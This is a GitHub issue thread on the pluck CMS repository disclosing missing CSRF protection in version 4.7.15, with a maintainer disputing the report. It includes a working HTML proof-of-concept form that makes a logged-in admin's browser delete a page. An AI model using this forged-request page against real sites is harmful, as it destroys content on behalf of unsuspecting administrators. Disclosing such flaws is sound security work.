search

pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org
54 stars 37 forks source link

CSRF Application Wide #116

Closed devansh3008 closed 1 year ago

devansh3008 commented 2 years ago

I have found multiple CSRF Issues on following version: 4.7.15

There is no use of Anticrsf token and Same site cookie being used. All endpoints are vulnerable even 4.7.16-dev4.

Only user needs to be logged in (no password is required to perform this issue)

exploit page_delete pluck-1 pluck-2 pluck-3 pluck-4 pluck-cms-4 7 16 POC-1

Valid POC: (exploit.html)

<html><head>
<title>CSRF PoC - Generated By AppSec Labs csrf-generator</title>
</head><body>
<form action="http://localhost/admin.php?action=deletepage&var1=csrf" method="GET">
<input type="text" name="action" value="deletepage" /><br />
<input type="text" name="var1" value="csrf" /><br />
<input type='submit' value='Go!' />
</form>
</body>
</html>

Click on this html page and you can see you delete page/trashcan objects. The issue is being reported by me on huntr.io. I am adding this as reference for you to go over the images.

BSteelooper commented 1 year ago

This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.

devansh3008 commented 1 year ago

The CSRF Issue requires an victim user to be authenticated. When he clicks on html poc, the exploit would be executed.

Thanks, Devansh

On Mon, Feb 20, 2023, 15:50 Bas Steelooper @.***> wrote:

This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.

— Reply to this email directly, view it on GitHub https://github.com/pluck-cms/pluck/issues/116#issuecomment-1436695764, or unsubscribe https://github.com/notifications/unsubscribe-auth/AHL2OPOM4UQT2W36RVL3GNLWYNAN7ANCNFSM5PQXODWQ . You are receiving this because you authored the thread.Message ID: @.***>